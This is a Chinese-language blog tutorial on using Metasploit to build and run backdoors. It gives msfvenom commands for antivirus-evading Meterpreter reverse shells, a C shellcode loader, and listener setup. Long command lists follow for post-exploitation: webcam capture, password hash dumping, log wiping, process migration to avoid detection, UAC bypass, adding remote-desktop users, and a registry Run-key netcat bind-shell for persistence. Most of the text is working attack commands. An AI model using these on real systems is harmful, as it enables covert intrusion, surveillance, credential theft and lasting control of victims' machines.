1.1 Metasploit 工具簡介
Metasploit 簡稱(MSF)是一款流行的開源滲透測試框架,由Rapid7
公司開發(fā),可以幫助安全和IT專業(yè)人士識別安全性問題,驗證漏洞的緩解措施,并管理專家驅(qū)動的安全性進行評估,提供真正的安全風(fēng)險情報。并且該框架還提供了一系列攻擊模塊和Payload
工具,可用于漏洞利用、及漏洞攻擊。同時軟件自身支持多種操作系統(tǒng)平臺,包括Windows、Linux、MacOS
等。直到今天Metasploit
已成為眾多黑客手中滲透攻擊的利器,并在安全領(lǐng)域大展身手。

??Metasploit官網(wǎng):https://metasploit.com/
Metasploit框架主要包含以下幾個組件:
??模塊庫:包含了一系列攻擊模塊和Payload工具,用戶可以利用這些模塊快速構(gòu)造攻擊代碼。
??Payload生成器:支持生成多種類型的Payload,包括反向Shell、Meterpreter、WebShell等。
??滲透測試工具:支持多種滲透測試技術(shù),包括端口掃描、漏洞掃描、密碼破解等。
??數(shù)據(jù)庫:用于存儲Metasploit框架的數(shù)據(jù)和攻擊結(jié)果,包括模塊信息、主機信息、漏洞信息等。
??插件系統(tǒng):支持自定義插件,可以擴展Metasploit的功能。
Metasploit 的優(yōu)勢在于其強大的攻擊模塊庫和Payload
生成器,可以幫助用戶快速構(gòu)造攻擊代碼并進行滲透測試。此外,該還支持多種漏洞利用技術(shù),包括遠程代碼執(zhí)行、緩沖區(qū)溢出、SQL注入等,可以滿足用戶不同的需求。
在使用該工具之前第一步則是要安裝此工具,由于該工具支持跨平臺,因此讀者可以根據(jù)自己的喜好自行安裝對應(yīng)系統(tǒng)版本,這里推薦在Linux
內(nèi)核的系統(tǒng)中使用該軟件,我們以Kali
系統(tǒng)為例講解工具的安裝流程及使用細節(jié)。

??Kali系統(tǒng)官網(wǎng):https://www.kali.org/
Kali Linux 是一款基于Debian
的Linux發(fā)行版,旨在提供一套專業(yè)的滲透測試和網(wǎng)絡(luò)安全審計工具集。Kali Linux由Offensive Security
公司維護和開發(fā),具有廣泛的社區(qū)支持和貢獻。Kali Linux包含了數(shù)百個網(wǎng)絡(luò)安全測試工具,包括漏洞掃描器、滲透測試工具、密碼破解工具、無線網(wǎng)絡(luò)測試工具等,可以幫助安全專業(yè)人士識別和評估網(wǎng)絡(luò)安全風(fēng)險,加強系統(tǒng)和網(wǎng)絡(luò)的安全性。
在默認情況下Kali
系統(tǒng)內(nèi)都會內(nèi)置Metasploit
工具,如果讀者使用的是其他第三方系統(tǒng),則MSF的安裝也非常容易,讀者只需要執(zhí)行如下幾條命令并等待片刻即可自動完成Metasploit的安裝;
curl?https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb?>?msfinstall?&&?\
??chmod?755?msfinstall?&&?\
??./msfinstall
當(dāng)讀者準備好測試環(huán)境后,可通過Kali
系統(tǒng)內(nèi)的頂部窗口打開控制臺,并輸入msfconsole
命令即可進入到MSF的交互式菜單中,效果如下圖所示;

Metasploit 生成并使用后門
Metasploit 是一個強大的滲透測試框架,它提供了廣泛的模塊,用于模擬各種安全攻擊。其中一個強大的功能是生成后門,它可以讓攻擊者在目標(biāo)系統(tǒng)中保持持久訪問權(quán)限。在本章中,我們將探討如何使用Metasploit
生成各類后門,并了解它是如何工作的。我們將通過實際演示來說明如何靈活的運用Metasploit
生成的后門,并介紹一些最常用的技巧。
如果讀者想要通過MSF生成后門,那么將會用到msfvenom
命令,msfvenom是Metasploit框架中的一個子命令,用于生成各種類型的惡意軟件,包括后門、漏洞利用代碼、木馬、蠕蟲等。它是msfpayload
和msfencode
的結(jié)合體,提供了更靈活的選項和更強的功能,該命令的常用參數(shù)如下所示;
命令功能描述-p指定需要使用的payload,即攻擊荷載。-l列出指定模塊的所有可用資源。-n為payload預(yù)先指定一個NOP滑動長度,用于防止程序崩潰。-f指定輸出格式,例如exe、elf、php、js等。-e指定需要使用的encoder編碼器,以隱藏惡意代碼。-a指定payload的目標(biāo)架構(gòu),例如x86、x64等。--platform指定payload的目標(biāo)平臺,例如Windows、Linux等。-s設(shè)定有效攻擊荷載的最大長度。-b設(shè)定規(guī)避字符集,以防止生成的payload中包含不可用字符。-i指定payload的編碼次數(shù)。--shellest最小化生成payload。
MSF工具一般可生成兩種類型的后門,一種是生成通用可執(zhí)行文件,此類功能需用戶在對端運行才可激活,需要注意的是由于此類后門已被各類殺毒軟件廠家捕捉了特征,通常后門的生存能力很低無法在安裝有殺毒軟件的設(shè)備中正常運行,另一種則是直接生成ShellCode代碼,此類代碼并無特征并支持遠程注入攻擊,ShellCode代碼形式在軟件安全,漏洞利用領(lǐng)域使用最為廣泛。
首先我們先來簡單介紹一下MSF如何生成EXE和DLL可執(zhí)行后門,如下案例中通過參數(shù)-a
指定平臺為x86也就是32位,如果讀者需要采用64位則此處應(yīng)對應(yīng)的改為x64,參數(shù)--platform Windows
用于指定生成平臺為windows
,參數(shù)-p windows/meterpreter/reverse_tcp
則用于指定使用的攻擊載荷為reverse_tcp
也就是反彈后門,參數(shù)lhost=192.168.1.20
指明了本機的IP地址,相對應(yīng)的lport=9999
則指明了本機端口,參數(shù)-f
指明了生成的文件格式為exe
,參數(shù)-o
則代表生成文件存儲位置,參數(shù)-e
是一種編碼器格式,shikata_ga_nai
是Metasploit
框架中的一種encoder
編碼器,它用于隱藏惡意代碼,以避免殺毒軟件和防火墻的檢測。shikata_ga_nai
是一種多次編碼器,可以通過多次重復(fù)編碼來混淆惡意代碼,以使其難以識別。
除了shikata_ga_nai
之外,Metasploit框架中還有許多其他編碼器,包括但不限于:
Encoder描述alphanum使用字母數(shù)字字符對代碼進行編碼。alpha_upper使用大寫字母字符對代碼進行編碼。fnstenv_mov使用FPU指令對代碼進行編碼。jmp_call_additive使用跳轉(zhuǎn)指令和調(diào)用指令對代碼進行編碼。nonalpha使用非字母字符對代碼進行編碼。nonupper使用非大寫字母字符對代碼進行編碼。unicode_upper使用Unicode字符對代碼進行編碼。
這些是Metasploit框架中常用的幾種編碼器,讀者可以根據(jù)需求選擇使用。
┌──(lyshark?kali)-[~]
└─$??msfvenom?-a?x86?--platform?Windows?-p?windows/meterpreter/reverse_tcp?\
lhost=127.0.0.1?lport=9999?-e?x86/shikata_ga_nai?-i?3?-b?'\x00\x0a\xff'?-f?exe?-o?payload.exe
┌──(lyshark?kali)-[~]
└─$??msfvenom?-p?windows/meterpreter/reverse_tcp?-b'\x0\x0b'?\
lhost=127.0.0.1?lport=9999?-f?dll?>?payload.dll
雖然生成EXE可執(zhí)行文件可以被使用,但筆者并不推薦,因為此類方式極容易被查殺,筆者更推薦生成ShellCode
代碼,并通過第三方應(yīng)用或通過系統(tǒng)漏洞來對其進行注入操作,此類實現(xiàn)將有利于后門的持續(xù)權(quán)限維持,如下命令則是生成ShellCode反彈后門的關(guān)鍵命令;
┌──(lyshark?kali)-[~]
└─$??msfvenom?-a?x86?--platform?Windows?-p?windows/meterpreter/reverse_tcp?\
-b?'\x00\x0b'?lhost=127.0.0.1?lport=9999?-f?c
┌──(lyshark?kali)-[~]
└─$??msfvenom?-a?x64?--platform?Windows?-p?windows/x64/meterpreter/reverse_tcp?\
-b?'\x00\x0b'?lhost=127.0.0.1?lport=9999?-f?c
我們以ShellCode
生成為例,當(dāng)前Kali攻擊主機IP地址為192.168.9.135
而被攻擊主機IP地址為192.168.9.118
此時,讀者需要現(xiàn)在攻擊主機生成一段ShellCode
并指定當(dāng)前主機IP參數(shù)等,輸出效果如下圖所示;

接著,讀者需要將此ShellCode
代碼增加一個執(zhí)行盒,并以此測試ShellCode
的完整性及可用性,由于生成的ShellCode
是C語言格式,則讀者應(yīng)使用C語言編譯器,如下案例中buf[]
用于填充我們自己的ShellCode代碼片段。
如下這段代碼,使用VirtualAlloc
函數(shù)在內(nèi)存中分配一塊空間,并使用memcpy
函數(shù)將緩沖區(qū)內(nèi)容復(fù)制到內(nèi)存中。然后,它將內(nèi)存中的代碼強制轉(zhuǎn)換為函數(shù)指針,并調(diào)用該函數(shù),以此實現(xiàn)反彈執(zhí)行的作用,其功能可總結(jié)為;
??對于緩沖區(qū)buf定義了一個數(shù)組,該數(shù)組的內(nèi)容為空。
??定義了一個類型為
void (__stdcall *CODE)()
的函數(shù)指針,該指針將指向內(nèi)存中的代碼。??使用
VirtualAlloc
函數(shù)在內(nèi)存中分配一塊空間,該空間大小為buf
數(shù)組的大小,并允許該空間可執(zhí)行、可讀、可寫。??使用
memcpy
函數(shù)將buf
數(shù)組內(nèi)容復(fù)制到內(nèi)存中。??將內(nèi)存中的代碼強制轉(zhuǎn)換為函數(shù)指針,并調(diào)用該函數(shù)。
unsigned?char?buf[]?=?"";
typedef?void(__stdcall?*CODE)?();
int?main()
{
????//?((void(*)(void))&buf)();
????PVOID?pFunction?=?NULL;
????pFunction?=?VirtualAlloc(0,?sizeof(buf),?MEM_COMMIT?|?MEM_RESERVE,?PAGE_EXECUTE_READWRITE);
????memcpy(pFunction,?buf,?sizeof(buf));
????CODE?StartShell?=?(CODE)pFunction;
????StartShell();
}
讀者需要打開Visual Studio 2013
編譯器,并新建一個控制臺應(yīng)用程序,將如上代碼復(fù)制到編輯器內(nèi),通過替換unsigned char buf[] = "";
為我們自己的ShellCode代碼,如下圖所示;

編譯通過后,讀者應(yīng)將lyshark.exe
后門拷貝到客戶端192.168.9.118
內(nèi);

服務(wù)端中,讀者需通過msfconsole
進入到MSF控制臺,并創(chuàng)建一個偵聽器組件,偵聽器適用于上線客戶端的,其中的lhost
則需傳遞本機的IP,其中的lport
則需要與本機開放端口保持一致;
msf6?>?use?exploit/multi/handler
[*]?Using?configured?payload?generic/shell_reverse_tcp
msf6?exploit(multi/handler)?>?set?payload?windows/meterpreter/reverse_tcp
payload?=>?windows/meterpreter/reverse_tcp
msf6?exploit(multi/handler)?>?set?lhost?192.168.9.135
lhost?=>?192.168.9.135
msf6?exploit(multi/handler)?>?set?lport?9999
lport?=>?9999
當(dāng)讀者配置參數(shù)完畢后,可通過show options
命令用于檢查配置參數(shù)的準確性,如果此時配置失誤讀者依然可以重新配置更改;

當(dāng)配置就緒,則只需要執(zhí)行exploit
則此時服務(wù)端將會進入偵聽模式,當(dāng)然讀者也可以使用exploit -j -z
將請求掛載到后臺;

至此當(dāng)被害主機運行lyshark.exe
進程時,則kali
服務(wù)端將會接收到反彈的上線會話,上線后讀者可通過sysinfo
來了解被控客戶端的主機信息,如下圖所示;

一旦讀者獲取到對端主機的控制權(quán),則可通過meterpreter
中提供的各類命令來對目標(biāo)主機進行信息收集工作,如下是該模塊中常用的一些操作命令,讀者可根據(jù)自行學(xué)習(xí)使用;
1.2.1 通用控制命令
meterpreter?>?essions?-k?1?????????????#?通過ID號殺死一個會話
meterpreter?>?background???????????????#?將會話放入后臺
meterpreter?>?getuid/getpid????????????#?查詢用戶權(quán)限與PID
meterpreter?>?sysinfo??????????????????#?查看目標(biāo)系統(tǒng)信息
meterpreter?>?ps???????????????????????#?查目標(biāo)主機進程
meterpreter?>?kill?PID?????????????????#?殺死目標(biāo)制定進程
meterpreter?>?getsystem????????????????#?嘗試令牌提權(quán)
meterpreter?>?shell????????????????????#?進入目標(biāo)shell環(huán)境
meterpreter?>?enumdesktops?????????????#?查看可用的桌面
meterpreter?>?getdesktop???????????????#?獲取當(dāng)前meterpreter關(guān)聯(lián)的桌面
meterpreter?>?set_desktop??????????????#?設(shè)置meterpreter關(guān)聯(lián)的桌面
meterpreter?>?screenshot???????????????#?截屏
meterpreter?>?run?vnc??????????????????#?使用vnc遠程桌面連接
meterpreter?>?uictl?disable?mouse??????#?禁用目標(biāo)鼠標(biāo)
meterpreter?>?uictl?enable?keyboard????#?開啟目標(biāo)鍵盤
meterpreter?>?webcam_list??????????????#?查看目標(biāo)主機攝像頭
meterpreter?>?webcam_snap??????????????#?攝像頭拍照
meterpreter?>?webcam_stream????????????#?開啟目標(biāo)主機攝像頭
meterpreter?>?clearav??????????????????#?銷毀日志文件
meterpreter?>?webcam_stream?-i?1/2?????#?打開前置或后置攝像頭
meterpreter?>?check_root???????????????#?檢測root
meterpreter?>?dump_calllog?????????????#?下載電話記錄
meterpreter?>?dump_contacts????????????#?下載信息記錄
meterpreter?>?geolocate????????????????#?谷歌地圖定位
1.2.2 Migrate進程遷移
進程遷移技術(shù)允許攻擊者將Meterpreter客戶端從當(dāng)前進程中遷移到另一個進程中。這可以避免檢測軟件識別Meterpreter客戶端,并對其進行清除。此外,進程遷移還可以幫助攻擊者隱藏其所在的進程,以避免被檢測。
meterpreter?>?execute??????????????????#?在目標(biāo)機器中執(zhí)行文件
meterpreter?>?execute?-H?-i?-f?cmd.exe?#?創(chuàng)建新進程cmd.exe?-H不可見-i交互
meterpreter?>?getpid
meterpreter?>?ps
meterpreter?>?migrate?PID??????????????#?通過PID號遷移進程
1.2.3 文件查閱與傳輸
Meterpreter 還具有文件查閱與遠程文件傳輸功能。這些功能允許攻擊者查看受害者計算機上的文件,并傳輸文件到受控機器。
meterpreter?>?getwd????????????????????????????????#?查看當(dāng)前工作目錄
meterpreter?>?search?-f?*filename*?????????????????#?搜索文件
meterpreter?>?cat?c:\\lyshark.log??????????????????#?查看文件內(nèi)容
meterpreter?>?upload?/tmp/shell.exe?C:\\shell.exe??#?上傳文件到目標(biāo)機
meterpreter?>?download?c:\\shell.exe?/tmp/?????????#?下載文件到本機上
meterpreter?>?edit?c:\\lyshark.log?????????????????#?VIM編輯或創(chuàng)建文件
meterpreter?>?rm?C:\\lyshark.log???????????????????#?刪除文件
meterpreter?>?getlwd???????????????????????????????#?看肉雞當(dāng)前目錄
meterpreter?>?lcd?/tmp?????????????????????????????#?切換目錄
1.2.4 端口轉(zhuǎn)發(fā)與掃描
網(wǎng)絡(luò)與端口轉(zhuǎn)發(fā)功能允許攻擊者將受害者的網(wǎng)絡(luò)流量轉(zhuǎn)發(fā)到受控機器,進而獲取機密信息或控制受害者的網(wǎng)絡(luò)資源。該功能通過創(chuàng)建一個代理服務(wù)器,以便將網(wǎng)絡(luò)流量從受害者的計算機轉(zhuǎn)發(fā)到受控機器。
#?網(wǎng)絡(luò)參數(shù)采集
meterpreter?>?ifconfig????????#?查詢?nèi)怆uIP地址
meterpreter?>?netstat?-antp???#?查詢目標(biāo)網(wǎng)絡(luò)連接
meterpreter?>?arp?-a??????????#?查詢目標(biāo)ARP緩存
meterpreter?>?getproxy????????#?查看目標(biāo)代理信息
meterpreter?>?route???????????#?查看目標(biāo)路由表
#?遠端端口掃描
meterpreter?>?run?post/windows/gather/arp_scanner?RHOSTS=192.168.9.0/24???????????#?掃描192.168.9.0/24網(wǎng)段
meterpreter?>?run?auxiliary/scanner/portscan/tcp?RHOSTS=192.168.9.135?PORTS=3389??#?檢測192.168.9.135是否開啟3389端口
#?端口轉(zhuǎn)發(fā)與端口關(guān)閉
meterpreter?>?portfwd?add?-l?9999?-p?3389?-r?127.0.0.1???#?將目標(biāo)機3389端口轉(zhuǎn)發(fā)到本地9999
meterpreter?>?portfwd?list???????????????????????????????#?查詢當(dāng)前轉(zhuǎn)發(fā)列表
meterpreter?>?portfwd?delete?-l?9999?????????????????????#?刪除本地主機的9999端口映射
#?添加與刪除主機路由
meterpreter?>?run?autoroute?-p??????????????????????????????#?查詢添加的路由記錄
meterpreter?>?run?autoroute?-s?10.10.10.1?-n?255.255.255.0??#?在目標(biāo)主機添加一條路由
meterpreter?>?run?autoroute?-d?-s?10.10.10.1????????????????#?刪除目標(biāo)主機中的路由
meterpreter?>?run?autoroute?-s?10.10.10.1/24????????????????#?添加一個路由網(wǎng)段
1.2.5 信息采集功能
信息采集功能是后滲透中的重要功能。它允許攻擊者從受害者計算機上采集信息,以便對其進行更深入的滲透。Metasploit 內(nèi)置了大量的信息采集模塊,用于從受害者計算機上收集信息。這些模塊包括獲取操作系統(tǒng)版本、已安裝的軟件、已運行的進程、網(wǎng)絡(luò)配置等信息。
在Kali
系統(tǒng)中,信息采集模塊被放置在了usr/share/metasploit-framework/modules
目錄下,這其中包括了針對各種型號設(shè)備的采集功能,如下圖所示;

以Windows系統(tǒng)中的搜集模塊為例,其默認存儲在/usr/share/metasploit-framework/modules/post/windows/gather
路徑下,讀者可取查看一下具體配置信息;

當(dāng)讀者在meterpreter
環(huán)境下時,這些功能可以被直接調(diào)用,我們已枚舉目標(biāo)服務(wù)為例,通過info
命令讀者可查詢特定模塊的定義規(guī)范,而run
則是運行這段枚舉程序;
meterpreter?>?info?post/windows/gather/enum_services????????#?查詢模塊配置參數(shù)
meterpreter?>?run?post/windows/gather/enum_services?????????#?枚舉目標(biāo)服務(wù)
meterpreter?>?run?post/windows/gather/enum_files????????????#?枚舉目標(biāo)服務(wù)
meterpreter?>?run?post/windows/gather/hashdump??????????????#?盜取Hash
meterpreter?>?run?post/windows/gather/checkvm???????????????#?是否虛擬機
meterpreter?>?run?post/windows/gather/forensics/enum_drives?#?查看分區(qū)
meterpreter?>?run?post/windows/gather/enum_applications?????#?獲取安裝軟件信息
meterpreter?>?run?post/windows/gather/dumplinks?????????????#?獲取最近的文件操作
meterpreter?>?run?post/windows/gather/enum_ie???????????????#?獲取IE緩存
meterpreter?>?run?post/windows/gather/enum_chrome???????????#?獲取Chrome緩存
meterpreter?>?run?post/windows/gather/enum_patches??????????#?補丁信息
meterpreter?>?run?post/windows/gather/enum_domain???????????#?查找域控
當(dāng)讀者執(zhí)行枚舉時,即可輸出目標(biāo)進程內(nèi)所有運行的服務(wù)信息,讀者可依據(jù)自己的需要選擇不同的服務(wù),如下圖所示則是枚舉服務(wù)列表;

1.2.6 目標(biāo)主機權(quán)限提升
針對目標(biāo)主機的提權(quán)操作有兩種情況,讀者可使用bypassuac
腳本嘗試提權(quán),也可使用enum_patches
枚舉出系統(tǒng)補丁信息,根據(jù)不同補丁采用不同的提權(quán)腳本實現(xiàn)。
#?使用bypassuac腳本嘗試提權(quán)
meterpreter?>?background
msf?>?use?exploit/windows/local/bypassuac
msf?>?set?SESSION?1
msf?>?run
#?收集目標(biāo)主機補丁情況
meterpreter?>?run?post/windows/gather/enum_patches
[+]?KB2871997?is?missing
[+]?KB2928120?is?missing
[+]?KB977165?-?Possibly?vulnerable?to?MS10-015?kitrap0d?if?Windows?2K?SP4?-?Windows?7
#?嘗試采用符合的提權(quán)腳本提權(quán)
meterpreter?>?background
msf?>?use?exploit/windows/local/ms13_053_schlamperei
msf?>?set?SESSION?1
msf?>?exploit
1.2.7 添加用戶與開啟遠程
通常用戶在獲取到目標(biāo)主機權(quán)限時,則可通過此命令在對端主機中開啟遠程桌面選項,以此來獲得一個長期穩(wěn)定的后門。
#?添加系統(tǒng)用戶與開啟遠程桌面
meterpreter?>?run?getgui?-e?????????????????????????????????????????????????????#?開啟遠程桌面
meterpreter?>?run?getgui?-u?lyshark?-p?123123???????????????????????????????????#?添加用戶
meterpreter?>?run?getgui?-f?9999?-e?????????????????????????????????????????????#?3389端口轉(zhuǎn)發(fā)到9999
#?啟用RDP桌面
meterpreter?>?run?post/windows/manage/enable_rdp????????????????????????????????#?開啟遠程桌面
meterpreter?>?run?post/windows/manage/enable_rdp?USERNAME=lyshark?PASSWORD=123??#?添加用戶
meterpreter?>?run?post/windows/manage/enable_rdp?FORWARD=true?LPORT=9999????????#?將3389端口轉(zhuǎn)發(fā)到9999
1.2.8 注冊表寫入后門
通過上傳命令將nc.exe
后門傳輸?shù)竭h程主機,并通過寫出currentversion
設(shè)置開機自啟動后門,實現(xiàn)長期權(quán)限維持,該功能通常用于后滲透階段的權(quán)限維持。
-d???注冊表中值的數(shù)據(jù)
-k???注冊表鍵路徑
-v???注冊表鍵名稱
enumkey?枚舉可獲得的鍵
setval?設(shè)置鍵值
queryval?查詢鍵值數(shù)據(jù)
#?上傳nc工具到根目錄
meterpreter?>?upload?/root/nc.exe?C:\\windows\\
#?枚舉run下的key
meterpreter?>?reg?enumkey?-k?HKLM\\software\\microsoft\\windows\\currentversion\\run
#?增加NC后門
meterpreter?>?reg?setval?-k?HKLM\\software\\microsoft\\windows\\currentversion\\run?-v?myshell?-d?'C:\windows\nc.exe?-Ldp?666?-e?cmd.exe'
#?查看鍵值
meterpreter?>?reg?queryval?-k?HKLM\\software\\microsoft\\windows\\currentversion\\Run?-v?myshell
#?攻擊者即可鏈接NC獲取Shell
┌──(lyshark?kali)-[~]
└─$?nc?-v?192.168.1.20?666
本文作者: 王瑞 本文鏈接: https://www.lyshark.com/post/8dc95bdd.html 版權(quán)聲明: 本博客所有文章除特別聲明外,均采用 BY-NC-SA 許可協(xié)議。轉(zhuǎn)載請注明出處!